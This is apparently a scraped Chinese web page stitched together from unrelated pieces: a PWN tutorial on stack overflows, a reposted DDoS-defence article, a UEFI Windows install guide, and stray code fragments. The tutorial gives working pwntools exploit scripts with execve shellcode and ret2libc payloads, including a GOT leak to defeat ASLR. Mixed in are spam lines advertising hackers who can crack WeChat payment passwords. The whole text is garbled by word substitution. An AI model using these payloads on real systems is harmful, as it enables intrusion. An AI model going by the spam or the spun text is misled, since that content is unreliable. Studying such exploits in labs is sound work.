一步一步学PWN一、环境：ubuntu虚拟机pwntoolsLibcSearcherROPgadget参阅：https://www.fjt1.com二、寄存器相关常识：EIP：首要用于寄存当时代码段行将被履行的下一条指令的偏移，但其本质上并不能直接被指令直接拜访。 最典型的栈溢出运用是掩盖程序的回来地址为进犯者所操控的地址，也便是掩盖EIPESP：栈顶指针，一直指向栈顶EBP：栈底指针，一般叫栈基址三、软件维护机制：CANNARY(栈维护)栈溢出维护是一种缓冲区溢出进犯缓解手法，当启用栈维护后，函数开端履行的时分会先往栈里刺进cookie信息，当函数实在回来的时分会验证cookie信息是否合法，假如不合法就中止程序运转。 进犯者在掩盖回来地址的时分往往也会将cookie信息给掩盖掉，导致栈维护检查失利而阻挠shellcode的履行。 在Linux中咱们将cookie信息称为canary。 NX（DEP）(数据履行维护 Data Execution Prevention)NX即No-eXecute（不行履行）的意思，NX（DEP）的基本原理是将数据地点内存页标识为不行履行，当程序溢出成功转入shellcode时，程序会测验在数据页面上履行指令，此刻CPU就会抛出反常，而不是去履行歹意指令。 PIE（ASLR）内存地址随机化机制（address space layout randomization)，有以下三种状况：0 - 表明封闭进程地址空间随机化1 - 表明将mmap的基址，stack和vdso页面随机化2 - 表明在1的基础上添加堆（heap）的随机化四、简略原理：当咱们在输入数据时，假如程序对输入没有约束，会导致输入的超出预订的规模，掩盖掉原本的数据左面为正常状况，右边是输入超出约束后假如咱们输入的不是一般的数据，而是结构的数据会怎样？结构后栈散布状况咱们完全能够经过更改原本的回来地址来操控程序的走向，上图中就运用回来地址来完结履行 shellcode当然上面那种状况是啥维护都不开的状况，咱们先从最简略的开端这儿用的是蒸米rop x86的比如源码如下：#include #include #include void vulnerable_function() {char buf[128];read(STDIN_FILENO, buf, 256); } int main(int argc, char** argv){ vulnerable_function();write(STDOUT_FILENO, "Hello, Worldn", 13);}运用以下指令进行编译：gcc -m32 -fno-stack-protector -z execstack -o level1 level1.c-m32意思是编译为32位的程序-fno-stack-protector和-z execstack这两个参数会分别关掉DEP和Stack Protector在 root 权限下履行：echo 0 > /proc/sys/kernel/randomize_va_space这样就关掉了整个体系的ASLR运用checksec指令来检查一下维护机制：运用一个python脚原本发作点数据python pattern.py create 150gdb ./level1调试程序r 运转，输入之前用脚本发明的字符串回车后发现报错如下：再运用 python 脚原本核算一下偏移：python pattern.py offset 0x37654136这儿解释一下，在 gdb 里报错的原因是原本的回来地址被咱们输入的字符串掩盖掉了，掩盖为了0x37654136，当程序去回来的时分出错了，运用 pattern.py offset核算出来的便是整个栈的巨细也便是说此刻的栈状况是如图所示：依据之前讲的原理，假如咱们能够找到填充的字符串开端的当地，把 0x37654136 改成找到的地址就能够履行咱们的句子了就像这样：那就能够顺畅履行到咱们期望能够履行的 shellcode 了还有个问题：gdb 的调试环境会影响 buf 在内存中的方位，尽管咱们封闭了 ASLR，但这只能确保 buf 的地址在 gdb 的调试环境中不变，但当咱们直接履行 ./level1 的时分，buf 的方位会固定在其他地址上这儿选用的办法是敞开：core dumpulimit -c unlimited敞开之后，当呈现内存过错的时分，体系会生成一个 core dump 文件在当时目录下。 然后咱们再用 gdb 检查这个 core 文件就能够获取到 buf 实在的地址了。 运用gdb调试转储的gdb level1 core运用x/10s $esp-144检查shellcode地址为什么是 esp-144 ？由于咱们报错的时分其实现已履行的到回来地址了，所以要在 140 的栈空间的基础上加上 4 字节的回来地址空间用 python 结合 pwntools 写运用脚本from pwn import *p = process('./level1')ret = 0xffffcee0shellcode = "x31xc9xf7xe1x51x68x2fx2fx73"shellcode += "x68x68x2fx62x69x6ex89xe3xb0"shellcode += "x0bxcdx80"payload = shellcode + 'A' * (140 - len(shellcode)) + p32(ret)p.send(payload)p.interactive()运用成功：接下来来进阶：依旧是蒸米的，运用这条指令编译翻开栈不行履行gcc -m32 -fno-stack-protector -o level2 level2.c这样之前的脚本就无法用了，由于咱们的 shellcode 是写在栈上的。 这时分就要用到另一种办法了 -- ret2libcret2libc 即操控函数的履行 libc 中的函数，一般是回来至某个函数的 plt 处或许函数的具体方位，一般状况下，咱们会挑选履行 system("/bin/sh")。 那么咱们怎样得到 system 函数的地址呢？这儿就首要运用了两个常识点system 函数归于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。 即便程序有 ASLR 维护，也仅仅针对于地址中间位进行随机，更低的 12 位并不会发作改动。 简略点说便是咱们现在无法在栈上履行需求的指令了，可是咱们能够去其他当地履行，在 libc.so 中就正好有咱们需求找的：system("/bin/sh")。 上题：前面提到关掉 ASLR 后 system() 函数在内存中的地址是不会改变的，而且 libc.so 中也包括 "/bin/sh" 这个字符串，而且这个字符串的地址也是固定的咱们运用 gdb 来找到这些地址用gdb ./level2调试咱们首先在main函数上下一个断点：b main然后履行程序：r这样的话程序会加载 libc.so 到内存中然后咱们就能够经过：print system这个指令来获取 system 函数在内存中的方位接下来咱们能够经过find指令来查找：find "/bin/sh" "/bin/sh" 这个字符串这样就找到了咱们需求的数据：system地址：0xf7e41940/bin/sh地址：0xf7f6002b写出 exp：from pwn import *p = process('./level2')ret = 0xffd76390systemaddr=0xf7e41940binshaddr=0xf7f6002bpayload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)p.send(payload)p.interactive()关于 ret 地址：system() 后边跟的是履行完 system() 后要回来的地址，接下来才是要给 system() 传递的参数："/bin/sh" 字符串的地址。 而咱们意图是履行 "/bin/sh"，ret 无所谓。 现在栈的散布大致是：运用成功：现在咱们翻开 ASLR，依旧是在root下echo 2 > /proc/sys/kernel/randomize_va_space这样由于地址随机化，咱们曾经的exp现已无效了咱们能够用ldd level2指令看一下 libc 的地址，每一次都在改变那咱们该怎样处理呐？咱们能够先泄漏出 libc.so 某些函数在内存中的地址，然后再运用泄漏出的函数地址依据偏移量核算出 system() 函数和 /bin/sh 字符串在内存中的地址，然后再履行咱们的 ret2libc 的 shellcode 就能够了运用：objdump -d -j .plt level2检查能够运用的函数运用：objdump -R level2检查对应 got 表由于 system() 函数和 write() 在 libc.so 中的 offset (相对地址)是不变的，所以假如咱们得到了 write() 的地址而且具有 libc.so 就能够核算出 system() 在内存中的地址了from pwn import *libc = ELF('libc.so')elf = ELF('level2')p = process('./level2')plt_write = elf.symbols['write']got_write = elf.got['write']vulfun_addr = 0x08048404payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)p.send(payload1)write_addr = u32(p.recv(4))system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)p.send(payload2)p.interactive()来解析一下 exp：payload1的意思是：填充 140 个 A 后回来地址掩盖为 write 函数，经过 got_write 将 write 函数的实在地址走漏出来，履行完结 write 函数之后，回来地址为 vul 函数，再次运用 vul 函数的溢出缝隙，完结缝隙运用作业运用成功：文件及脚本打包：链接：https://pan.baidu.com/s/1r0yNqwS_AzpXaqrfVQZ3nA提取码：l9dzNewProgramName.c_str(),一个多月前，我的个人网站遭受 DDOS 进犯，下线了50多个小时。 这篇文章就来谈谈，怎么应对这种进犯。 需求阐明的是，我对 DDOS 并不通晓，从没想过自己会成为进犯方针。 进犯发作今后，许多萍水相逢的朋友供给了各种协助和主张，让我学到了许多东西。 这儿记载的便是对我最有协助的一些解决方案。 一、DDOS 是什么？首要，我来解释一下，DDOS 是什么。 举例来说，我开了一家餐厅，正常情况下，最多能够包容30个人一起进餐。 你直接走进餐厅，找一张桌子坐下点餐，立刻就能够吃到东西。 很不幸，我开罪了一个流氓。 他派出300个人一起涌进餐厅。 这些人看上去跟正常的顾客相同，每个都说"赶快上餐"。 可是，餐厅的容量只需30个人，底子不可能一起满意这么多的点餐需求，加上他们把门口都堵死了，里三层外三层，正常用餐的客人底子进不来，实际上就把餐厅瘫痪了。 这便是 DDOS 进犯，它在短时刻内建议很多恳求，耗尽服务器的资源，无法呼应正常的拜访，形成网站实质下线。 DDOS 里边的 DOS 是 denial of service（中止服务）的缩写，表明这种进犯的意图，便是使得服务中止。 最前面的那个 D 是 distributed （分布式），表明进犯不是来自一个当地，而是来自五湖四海，因而更难防。 你关了前门，他从后门进来；你关了后门，他从窗口跳起来。 二、DDOS 的品种DDOS 不是一种进犯，而是一大类进犯的总称。 它有几十品种型，新的进犯 *** 还在不断创造出来。 网站运转的各个环节，都能够是进犯方针。 只需把一个环节攻破，使得整个流程跑不起来，就达到了瘫痪服务的意图。 其间，比较常见的一种进犯是 cc 进犯。 它便是简略粗犷地送来很多正常的恳求，超出服务器的更大接受量，导致宕机。 我遭受的便是 cc 进犯，最多的时分全世界大约20多个 IP 地址轮番宣布恳求，每个地址的恳求量在每秒200次左右。 我看拜访日志的时分，就觉得那些恳求像洪水相同涌来，一眨眼便是一大堆，几分钟的时刻，日志文件的体积就大了100MB。 本文以下的内容都是针对 cc 进犯。 三、HTTP 恳求的阻拦假如歹意恳求有特征，抵挡起来很简略：直接阻拦它就行了。 HTTP 恳求的特征一般有两种：IP 地址和 User Agent 字段。 比方，歹意恳求都是从某个 IP 段宣布的，那么把这个 IP 段封掉就行了。 或许，它们的 User Agent 字段有特征（包括某个特定的词语），那就把带有这个词语的恳求阻拦。 阻拦能够在三个层次做。 （1）专用硬件Web 服务器的前面能够架起硬件防火墙，专门过滤恳求。 这种作用更好，可是价格也最贵。 （2）本机防火墙操作系统都带有软件防火墙，Linux 服务器一般运用 iptables。 比方，阻拦 IP 地址1.2.3.4的恳求，能够履行下面的指令。 iptables 比较复杂，我也不太会用。 它对服务器功能有必定影响，也防不住大型进犯。 （3）Web 服务器Web 服务器也能够过滤恳求。 阻拦 IP 地址1.2.3.4，nginx 的写法如下。 Apache 的写法是在.htaccess文件里边，加上下面一段。 假如想要更准确的操控（比方自动识别并阻拦那些频频恳求的 IP 地址），就要用到 WAF。 这儿就不具体介绍了，nginx 这方面的设置能够参阅如下地址：https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/https://www.nginx.com/blog/rate-limiting-nginx/Web 服务器的阻拦十分耗费功能，尤其是 Apache。 略微大一点的进犯，这种 *** 就没用了。 四、带宽扩容上一节的 HTTP 阻拦有一个条件，便是恳求有必要有特征。 可是，实在的 DDOS 进犯是没有特征的，它的恳求看上去跟正常恳求相同，并且来自不同的 IP 地址，所以无法阻拦。 这便是为什么 DDOS 特别难防的原因。 当然，这样的 DDOS 进犯的本钱不低，一般的网站不会有这种待遇。 不过，真要遇到了该怎么办呢，有没有底子性的防备 *** 呢？答案很简略，便是设法把这些恳求都消化掉。 30个人的餐厅来了300人，那就想 *** 把餐厅扩展（比方暂时再租一个门面，并请一些厨师），让300个人都能坐下，那么就不影响正常的用户了。 关于网站来说，便是在短时刻内急剧扩容，供给几倍或几十倍的带宽，顶住大流量的恳求。 这便是为什么云服务商能够供给防护产品，由于他们有很多冗余带宽，能够用来消化 DDOS 进犯。 一个朋友教授了一个 *** ，给我留下深刻印象。 某云服务商许诺，每个主机保 5G 流量以下的进犯，他们就一口气买了5个。 网站架起在其间一个主机上面，可是不露出给用户，其他主机都是镜像，用来面临用户，DNS 会把拜访量均匀分配到这四台镜像服务器。 一旦呈现进犯，这种架构就能够防住 20G 的流量，假如有更大的进犯，那就买更多的暂时主机，不断扩容镜像。 五、CDNCDN 指的是网站的静态内容分发到多个服务器，用户就近拜访，进步速度。 因而，CDN 也是带宽扩容的一种 *** ，能够用来防护 DDOS 进犯。 网站内容存放在源服务器，CDN 上面是内容的缓存。 用户只允许拜访 CDN，假如内容不在 CDN 上，CDN 再向源服务器宣布恳求。 这样的话，只需 CDN 够大，就能够抵挡很大的进犯。 不过，这种 *** 有一个条件，网站的大部分内容有必要能够静态缓存。 关于动态内容为主的网站（比方论坛），就要想其他 *** ，尽量削减用户对动态数据的恳求。 上一节说到的镜像服务器，实质便是自己建立一个微型 CDN。 各大云服务商供给的高防 IP，背面也是这样做的：网站域名指向高防 IP，它供给一个缓冲层，清洗流量，并对源服务器的内容进行缓存。 这儿有一个要害点，一旦上了 CDN，千万不要走漏源服务器的 IP 地址，不然进犯者能够绕过 CDN 直接进犯源服务器，前面的尽力都白搭。 搜一下"绕过 CDN 获取实在 IP 地址"，你就会知道国内的黑产职业有多猖狂。 cloudflare 是一个免费 CDN 服务，并供给防火墙，高度引荐。 我还要感谢 v2ex.com 的站长 @livid 热心供给协助，我现在用的便是他们的 CDN 产品。 本文转载自“阮一峰的 *** 日志”，由“编码之道”编辑整理。 DWORD cntUsage; } more_clear_headers 'X-Frame-Options';

*** it LED0 = P0^0; refs (you can useeither or both)

ipFailed[ip] = 0 # invalid user trail *** 黑客6,黑客 *** pp市场任务,黑客能破解微信支付密码

大家好，我是Robot小牧，一个计算机常识的转移者，期望经过自己的尽力与想要了解计算机硬件常识的同学一同共享计算机硬件相关的常识。 上一篇文章咱们介绍了UEFI BIOS和Legacy BIOS的差异，今日咱们再一同讨论下UEFI形式下装置操作体系。 该篇文章是以超微主板X11DAi-N为例，不同厂家的主板在设置项的命名或许设置项方位或许不同，但需求设置的内容是根本共同的。 一、东西和软件预备OS：Windows 10操作体系。 主张各位从微软官网下载，网上破解版的PE环境设置与主板BIOS或许会存在不兼容的问题。 驱动：硬盘假如制造了RAID，需求下载驱动，装置时加载驱动后才干辨认硬盘空间。 DOS盘制造东西：引荐各位运用rufus东西制造。 U盘二、装置过程1.DOS盘制造：如下图所示，顺次设置如下几项，其它选项依照默许即可。 a. 设备：挑选要制造DOS引导盘的设备；b.引导类型挑选：挑选引导类型为FreeDOSc.卷标：设置DOS引导盘盘符名d.文件体系：挑选文件体系格局FAT322.将Windows装置文件和驱动复制到U盘内。 3.将U盘插到主板，主板开机按DEL进BIOS，顺次设置如下选项。 a. 设置SATA mode：设置SATA形式前，先承认硬盘是连接到板载SATA控制器仍是sSATA控制器。 Intel PCH SATA有2个控制器，别离SATA控制器和sSATA控制器。 咱们以SATA控制器为例。 点击SATA configuration进入SATA控制器设置，进入SATA控制器设置界面后，装置的硬盘会显现在SATA port下。 Intel PCH SATA mode支撑IDE、AHCI和RAID三种形式。 支撑IDE接口硬盘挑选IDE形式；支撑SATA硬盘且无需制造RAID，挑选AHCI形式；支撑SATA硬盘组要制造RAID，挑选RAID形式。 挑选RAID形式后，要设置SATA/sSATA RAID boot为【SATA Controller】，设置SATA RAID Option ROM/UEFI Driver为【EFI】。 Legacy形式下装置操作体系时，SATA RAID Option ROM/UEFI Driver设置为【Legacy】。 b. 设置Secure Boot：为进步兼容性，需求设置Secure Boot为【Disable】。 比较旧的主板还需求翻开 C *** ，该主板默许支撑C *** 形式，无需设置。 大部分主板都默许支撑C *** 。 c. 设置发动形式UEFI形式下装置操作体系，设置Boot mode select为【UEFI】或许【DUAL】；Legacy形式下装置操作体系，设置Boot mode select为【Legacy】或许【DUAL】。 UEFI形式下装置的操作体系，发动 *** 有必要使UEFI发动；Legacy形式下装置的操作体系，发动 *** 有必要使Legacy发动。 4.制造RAID【如需制造RAID】BIOS设置完结后按F4保存设置并重启，BIOS发动过程中依照提示按CTRL+I进入RAID制造界面。 【关于RAID制造，会在另一篇文章中具体介绍】5.BIOS发动过程中，按F11进发动选项挑选，挑选发动盘，引导进入体系装置界面。 6.装置Windows 10操作体系：a. 挑选言语等选项，点击【下一步】。 b. 挑选【现在装置】，体系发动装置程序。 c. 进入BIOS激活页面，有密钥输入密钥激活，无密钥挑选【我没有产品密钥】持续。 d. 挑选要装置windows类型，点【下一步】。 e. 点选【承受答应条款】，点击【下一步】。 f. 挑选【自定义装置】。 g. 挑选硬盘，并设置硬盘格局和分区。 小编的两块盘制造的RAID1，需求加载RAID驱动后才干辨认到硬盘卷。 点击【加载驱动程序】。 点击【阅读】，找到寄存驱动的文件夹，点击确认，程序会主动搜索可用的驱动，挑选要装置的东西并点击【下一步】，驱动加载后会显现未分配的硬盘空间。 点击【新建】，创立分区，并点击【下一步】。 挑选【主分区】，点击【下一步】发动体系装置，体系会主动装置，装置完结后会重启进入体系。 7.体系装置完结后，机器会重启进入体系，进入体系后各位同学留意装置相关硬件设备驱动。 三、留意事项BIOS发动 *** 为UEFI对应的硬盘格局为GPT格局；发动 *** 为Legacy对应的硬盘格局为MBR格局，更大容量不超越2T。 【UEFI+GPT】【Legacy+MBR】UEFI形式下装置的操作体系，发动 *** 有必要使UEFI发动；Legacy形式下装置的操作体系，发动 *** 有必要使Legacy发动。 UEFI形式下装置操作体系，为进步兼容性，需求在BIOS下设置Secure Mode封闭，C *** 翻开。 C *** （Compatibility support Module）表明兼容模块，该选项专为兼容只能在legacy形式下作业的设备以及不支撑或不能彻底支撑UEFI的操作体系而设置。 设置RAID形式后，需求加载RAID驱动后才干辨认到硬盘卷。 有同学如需装置Legacy形式发动的操作体系，参照该文章的内容也能够进行。 好了，该篇文章的内容就介绍到这，下一篇文章咱们将介绍板载RAID和外插RAID卡制造RADI的过程，感兴趣的同学请持续重视。 logon.jsplogin.jsp「 *** 黑客6,黑客 *** pp市场任务,黑客能破解微信支付密码」 *** 黑客6,黑客 *** pp市场任务

一、前语

说起来也比较久了，故事起源于上一年11月份，我在公司工作环境建立了一个dvwa的靶场环境，用于web缝隙的测验，不经意的发现access log日志增加敏捷，检查之后吓出一身盗汗。